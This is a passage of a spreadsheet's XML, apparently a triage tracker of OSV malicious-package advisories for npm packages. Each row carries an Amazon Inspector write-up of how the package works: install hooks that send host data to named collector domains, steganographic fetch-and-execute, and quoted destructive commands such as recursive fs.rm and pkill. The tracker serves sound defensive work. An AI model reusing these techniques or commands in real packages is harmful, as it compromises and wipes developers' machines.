        </is>
      </c>
      <c r="P71" s="5" t="inlineStr"/>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (80ee3815d12ec95aedb4bbe0d3de5c516e99163ca1eba52c2a3de7038b9a2ac0)
package.json declares a preinstall hook that runs index.js on npm install. The script collects hostname, username, home directory, DNS servers, current working directory, and package.json contents, and reads /etc/passwd and /etc/hosts from the installer's host. The collected data is HTTPS-POSTed to a hardcoded Burp Collaborator subdomain at ipbtwv9063nc5hvhodh0s4u9x03rrhf6.oastify.com. The package has no advertised functionality beyond this exfiltration payload.
</t>
        </is>
      </c>
      <c r="S71" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16063</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16064</t>
        </is>
      </c>
      <c r="D72" s="5" t="inlineStr"/>
      <c r="E72" s="5" t="inlineStr"/>
      <c r="F72" s="5" t="inlineStr"/>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr">
        <is>
          <t>npm:bx-ui-view</t>
        </is>
      </c>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr"/>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ce3874d2c55544bbbf59b6a60c3002b13e242fb53160a455597b13fdd37231f8)
package.json declares a dependency whose key equals the package's own name (bx-ui-view) and whose value is a plain HTTPS URL (https://package-access.pages.dev/bx-ui-view) rather than a registry version range. On `npm install`, npm resolves this URL, downloads whatever tarball is served, and executes any lifecycle scripts inside it — with no version pin, no integrity check, and no hash/signature verification. The shipped index.js is a 3-line inert stub, so the manifest line is the entire published surface: the installer receives whatever content the operator of package-access.pages.dev chooses to serve at install time. The self-name + off-registry URL + stub source combination is the dependency-confusion / smuggled-payload shape, and the pages.dev host is unrelated to any registry or declared publisher domain.
</t>
        </is>
      </c>
      <c r="S72" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16064</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16065</t>
        </is>
      </c>
      <c r="D73" s="5" t="inlineStr"/>
      <c r="E73" s="5" t="inlineStr"/>
      <c r="F73" s="5" t="inlineStr"/>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr">
        <is>
          <t>npm:express-session-timer</t>
        </is>
      </c>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr"/>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (325e241839ca2d0861d19807df248bf7b06922533bccb441bbee521471f5d73f)
express-session-timer@1.0.1 schedules an unconditional destructive routine at module load time. Approximately 18 seconds after `require('express-session-timer')`, the package recursively removes `&lt;cwd&gt;/src` via `fs.rm(path.join(process.cwd(),'src'), {recursive:true, force:true})` and terminates Node processes with `pkill -f "node.*${process.cwd()}"` on Unix, `taskkill /IM node.exe /F` on Windows, and `npx pm2 delete all`. The behavior fires with no configuration, opt-in, or relationship to the package's advertised functionality — merely importing the module deletes the installer's source tree and stops their running server. The manifest also pins `express-timer: ^0.0.1-security`, npm's security-hold placeholder convention, indicating an unpinned resolution against a name previously held after takedown.
</t>
        </is>
      </c>
      <c r="S73" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16065</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16069</t>
        </is>
      </c>
      <c r="D74" s="5" t="inlineStr"/>
      <c r="E74" s="5" t="inlineStr"/>
      <c r="F74" s="5" t="inlineStr"/>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr">
        <is>
          <t>npm:reactlogo-load</t>
        </is>
      </c>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr"/>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a0f9d76fcf9f229c0a11508004a2be764133c6195530c4d56563eb28c358ab5f)
The package presents itself as a logo/color utility but its exported loadLogo() function extracts a URL from LSB-encoded bits of a PNG, fetches the response body, and executes it via a reflective Function-constructor invocation. The 'constructor' property name and the Function reference are hidden behind a deterministic string-shuffle helper (hsvMean) named as a color utility, so no plaintext 'constructor', 'Function', 'eval', or destination URL appears in the source. runInContext binds global.require, module, and exports into the executed script, giving the fetched code full Node runtime capability on the caller's host. Following the README's documented usage (vite/tailwind build integration) triggers the fetch-and-execute path, so arbitrary attacker-controlled code runs on any machine that adopts this library.
</t>
        </is>
      </c>
      <c r="S74" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16069</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16070</t>
        </is>
      </c>
      <c r="D75" s="5" t="inlineStr"/>
      <c r="E75" s="5" t="inlineStr"/>
      <c r="F75" s="5" t="inlineStr"/>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr">
        <is>
          <t>npm:@fyxzpediaa/baileys</t>
        </is>
      </c>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr"/>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0747ec3c1ce519798cac2e89f8ec1e1532d428355a13929f0176a11d77a2b175)
This fork of Baileys injects a covert remote-directed action into the WhatsApp socket. On every WebSocket connection, socketConnect() reconstructs a URL from a char-code array (decoding to https://raw.githubusercontent.com/skyzopedia/NewsletterID/refs/heads/main/VIP_Push.json), fetches a JSON list from that mutable GitHub branch, and 200 seconds after connect iterates the list issuing authenticated `w:mex` queries with query_id 7871414976211147 (QueryIds.FOLLOW) against the installer's own WhatsApp session. A separate exported helper `generateMessageV` decodes a base64+XOR(key=23)-obfuscated string to a hardcoded `&lt;digits&gt;@newsletter` JID and invokes the same FOLLOW query. The obfuscation of both the URL (char-code array) and the JID literal (base64+XOR) exists solely to hide these targets from source review; upstream Baileys does not contain this code path. The runtime dependency `@whiskeysockets/eslint-config` is also declared as a mutable GitHub tarball reference (`github:whiskeysockets/eslint-config`) rather than a pinned registry range, so `npm install` resolves it to whatever that repository's default branch currently contains. The covert action uses the installer's authenticated identity to gain reach for author-chosen newsletter IDs but does not exfiltrate credentials, install persistence, or execute remote code on the installer's host; the harm is loss of control over the installer's WhatsApp account actions, not machine compromise.
</t>
        </is>
      </c>
      <c r="S75" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16070</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16071</t>
        </is>
      </c>
      <c r="D76" s="5" t="inlineStr"/>
      <c r="E76" s="5" t="inlineStr"/>
      <c r="F76" s="5" t="inlineStr"/>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr">
        <is>
          <t>npm:cat-sis2go-utils</t>
        </is>
      </c>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr"/>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">cat-sis2go-utils is a dependency-confusion package published against the SIS2GO namespace, with versions inflated to 99.0.0 and 99.1.0. It ships no library code (index.js is an 87-byte stub), and package.json declares both preinstall and postinstall running `node scripts/run.js`, so the payload executes twice during npm install before any application code. The script resolves a DNS canary and POSTs to a webhook.site collector; 99.1.0 additionally sends os.userInfo().username and os.hostname(). The author labels this a PoC, but the beacon fires on any install that resolves the package and exfiltrates a username usable for follow-on attacks, and dependency-confusion packages require incident response even when trivial.
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ad357542f3dd0e1b598ef36d440b1868ac28c6889226864bf799b2f7b6bf5e91)
Package cat-sis2go-utils@99.0.0 declares both preinstall and postinstall lifecycle hooks in package.json that execute scripts/run.js on every npm install. The script unconditionally issues a DNS lookup against d22d92dc-84e5-4b58-8cd6-75bf1ac452c7.dnshook.site and POSTs a JSON beacon containing the installer's hostname and process context to https://webhook.site/d22d92dc-84e5-4b58-8cd6-75bf1ac452c7. The package description self-identifies as a dependency-confusion PoC, and the 99.0.0 version is consistent with a resolution-winning squat targeting an internal package name. Installing the package results in arbitrary code execution on the installer host and fingerprints the machine to third-party out-of-band collectors under the operator's control.
</t>
        </is>
      </c>
      <c r="S76" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16071</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16072</t>
        </is>
      </c>
      <c r="D77" s="5" t="inlineStr"/>
      <c r="E77" s="5" t="inlineStr"/>
      <c r="F77" s="5" t="inlineStr"/>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr">
        <is>
          <t>npm:easypanel-agent</t>
        </is>
      </c>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr"/>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7eb103b6863369372ba8c07701264f8b0f6b57e3217e07912c8efbd9371c648f)
The package's preinstall lifecycle script (preinstall.js) executes automatically on `npm install` and collects the installer's hostname, OS username, current working directory, and CI-related environment variable names. The collected data is base64-encoded and transmitted to a hardcoded out-of-band collector under lyomeri.com via both a DNS lookup (encoding data into a subdomain label under easypanel-agent.&lt;data&gt;.oob.lyomeri.com) and an HTTP GET request to the same host. The package's main entry, index.js, is an empty stub (`module.exports = {}`), so the install-time beacon is the sole functional behavior. The package name mimics the 'easypanel' product, consistent with a dependency-confusion or typosquat delivery vehicle. An in-source comment self-labeling the code as a 'benign canary' does not change that installer-controlled data leaves the machine without consent to an author-controlled endpoint.
</t>
        </is>
      </c>
      <c r="S77" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16072</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16073</t>
        </is>
      </c>
      <c r="D78" s="5" t="inlineStr"/>
      <c r="E78" s="5" t="inlineStr"/>
      <c r="F78" s="5" t="inlineStr"/>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr">
        <is>
          <t>npm:easypanel-api-client</t>
        </is>
      </c>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr"/>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (cef6da51fcc215c514680417cfd3bacb5725b91a5b4a058fd6d2b161106209b0)
The package ships an empty library body (index.js exports {}) and a preinstall lifecycle script that runs automatically on npm install. The preinstall script collects installer-side identifiers — hostname, username, current working directory, and the names of CI-related environment variables — base64url-encodes them, and transmits them via both a DNS lookup and an HTTP request to a subdomain of oob.lyomeri.com (e.g. easypanel-api-client.&lt;encoded-chunk&gt;.oob.lyomeri.com, with the HTTP variant POSTing to /npm/&lt;encoded&gt;). The package has no functional code beyond this beacon, matching the dependency-confusion / namespace-squat research-beacon shape targeting internal package names.
</t>
        </is>
      </c>
      <c r="S78" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16073</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16074</t>
        </is>
      </c>
      <c r="D79" s="5" t="inlineStr"/>
      <c r="E79" s="5" t="inlineStr"/>
      <c r="F79" s="5" t="inlineStr"/>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr">
        <is>
          <t>npm:easypanel-deploy</t>
        </is>
      </c>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr"/>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0ac486399ab6c99cf83bfcf80e487c414fd29430e27f0d929ff7034ed333c7e8)
The package's preinstall lifecycle script runs automatically on `npm install` and collects installer-side identifiers — `os.hostname()`, `os.userInfo().username`, the current working directory, and CI-related environment variable names — base64url-encodes them, and sends them to a hardcoded third-party out-of-band collector under `oob.lyomeri.com` via both a DNS lookup (`easypanel-deploy.&lt;chunk&gt;daco3v4q6f49egu1ds1gwjnsjb88s5kcp.oob.lyomeri.com`) and an HTTP GET request to the same host. The behavior fires without user consent on install, exfiltrates host reconnaissance data to an attacker-controlled endpoint, and is consistent with a dependency-confusion / beacon package. An in-source comment labeling this as a 'benign canary' does not change the observable behavior.
</t>
        </is>
      </c>
      <c r="S79" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16074</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16075</t>
        </is>
      </c>
      <c r="D80" s="5" t="inlineStr"/>
      <c r="E80" s="5" t="inlineStr"/>
      <c r="F80" s="5" t="inlineStr"/>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr">
        <is>
          <t>npm:easypanel-hosting</t>
        </is>
      </c>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr"/>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (db6a378b33bb2f33088ed90db4ac48e81368e30d5ef38578dca3b4345e9cb06b)
easypanel-hosting@1.0.0 ships a stub index.js (`module.exports = {}`) and an npm preinstall lifecycle script that collects the installer's hostname, username, current working directory, and CI-related environment variable names, base64url-encodes them, and sends them off-host via a DNS lookup and an HTTP request to a hardcoded out-of-band subdomain under lyomeri.com (e.g. `easypanel-hosting.&lt;token&gt;.oob.lyomeri.com`, with the encoded payload placed in the DNS label and in the HTTP path `/npm/&lt;encoded&gt;`). The exfiltration fires automatically on `npm install` before any user code runs. The empty main module and package name resembling a hosting-adjacent product are consistent with a dependency-confusion or reconnaissance probe; regardless of framing, installer identity metadata leaves the machine unconditionally to an author-controlled OOB collector.
</t>
        </is>
      </c>
      <c r="S80" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16075</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16076</t>
        </is>
      </c>
      <c r="D81" s="5" t="inlineStr"/>
      <c r="E81" s="5" t="inlineStr"/>
      <c r="F81" s="5" t="inlineStr"/>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr">
        <is>
          <t>npm:external_deps_enjoyer</t>
        </is>
      </c>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr"/>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8d4909b60251f0448ff7bc689262f363e3ec4c2cebf82abe3eb0c7f8769931a6)
package.json declares dependencies and optionalDependencies whose specifiers point at non-registry, attacker-controlled or mutable sources rather than the npm registry. Listed sources include a Discord CDN attachment tarball (cdn.discordapp.com/attachments/.../runtime.tgz), plain-HTTP tarballs at bare IPs (http://203.0.113.77:8443/drop/pkg.tgz, HTTP://198.51.100.44/.../pkg.tgz), git://203.0.113.91/hidden/repo.git, an ngrok tunnel (abc123xyz.ngrok-free.app), rentry.co raw content, gist shorthands (gist:c0ffee00deadbeef), and github/gitlab/bitbucket shorthands to throwaway repos (tmp-drop-8821/...). Specifier keys are duplicated with case variants (tarball-http vs tarball-HTTP, github-shorthand vs GITHUB-shorthand) and mix uppercase URI schemes with scp-style git refs and local path forms (link:, portal:, file:, /tmp/..., \Windows\Temp\...), a pattern engineered to evade regex-based scanners. On npm install, npm fetches each specifier and executes any lifecycle scripts the fetched package declares; because the sources are mutable and controlled by third parties, the code that runs is whatever the operators of those hosts currently serve.
</t>
        </is>
      </c>
      <c r="S81" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16076</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16077</t>
        </is>
      </c>
      <c r="D82" s="5" t="inlineStr"/>
      <c r="E82" s="5" t="inlineStr"/>
      <c r="F82" s="5" t="inlineStr"/>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr"/>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr">
        <is>
          <t>npm:chai-as-sleek</t>
        </is>
      </c>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr"/>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (782914cb65e0d30697eb54f50a4c5b740a3a53941abc185759e296c1d2ec8e9e)
Package published as 'chai-as-sleek' impersonates the pino logger: README, LICENSE, docs/, and index.d.ts are copied verbatim from pino, while package.json description reads 'This document describes the management of vulnerabilities...' and the README also markets the package as a chai plugin. The main entrypoint index.js unconditionally executes `require('./lib/config')` at load time. lib/config.js is a single ~4 MB line of obfuscator.io-obfuscated JavaScript (23,868-entry rotated string array, decoder functions T and j, control-flow flattening, ~20k decoder-wrapper calls) with no configuration content. package.json declares `axios ^1.10.0` as a runtime dependency, but no readable source file imports axios — the only reachable consumer of the HTTP client is the opaque blob in lib/config.js. Any consumer that imports 'chai-as-sleek' executes this hidden payload at require() time with outbound HTTP capability provisioned.
</t>
        </is>
      </c>
      <c r="S82" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16077</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16078</t>
        </is>
      </c>
      <c r="D83" s="5" t="inlineStr"/>
      <c r="E83" s="5" t="inlineStr"/>
      <c r="F83" s="5" t="inlineStr"/>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr">
        <is>
          <t>npm:cache-cleanup-module</t>
        </is>
      </c>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr"/>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (2931c2feef07a63612b0886a1840e519516424af0fbf4fb0a138e97736a18857)
cache-cleanup-module ships an exported runOperation() that queries a hardcoded third-party endpoint at https://testback-2aqe.onrender.com/can-cleanup (authenticated with a static x-api-key token 'f8675764-417f-49a4-807c-5879a667c476') and, when the response contains allowed:true, recursively deletes every entry in the caller's current working directory (or a supplied path) via fs.rmSync({recursive:true, force:true}) and fs.unlinkSync, skipping only the module file itself. The package's stated purpose of 'safe, transparent cache and build artifact cleanup' is not reflected in the code: there is no filter restricting the deletion to cache or build artifact paths, so any consumer that invokes runOperation() has the entirety of their cwd wiped at the remote operator's discretion. The hardcoded endpoint and static API token give the author unilateral, per-install control over when destruction fires on installer machines.
</t>
        </is>
      </c>
      <c r="S83" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16078</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16079</t>
        </is>
      </c>
      <c r="D84" s="5" t="inlineStr"/>
      <c r="E84" s="5" t="inlineStr"/>
      <c r="F84" s="5" t="inlineStr"/>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr">
        <is>
          <t>npm:server-authorized-cleanup</t>
        </is>
      </c>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr"/>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ba50dd2c597a65e5fa5bd8aa2675ac16fb443c6d42381921fde160c9596f44d2)
server-authorized-cleanup exposes triggerCleanup() which issues an HTTPS GET to the hardcoded author endpoint https://testback-2aqe.onrender.com/can-cleanup (authenticated with a hardcoded x-api-key header) and, when the response JSON contains allowed:true, invokes performCleanup() to recursively fs.rmSync every entry under the target directory (default process.cwd()). The go/no-go decision for the destructive action is made by an author-operated server, not the caller, and the destination is not caller-configurable. Any consumer that invokes the advertised API cedes a remote kill switch over their working-directory tree to that endpoint.
</t>
        </is>
      </c>
      <c r="S84" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16079</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16080</t>
        </is>
      </c>
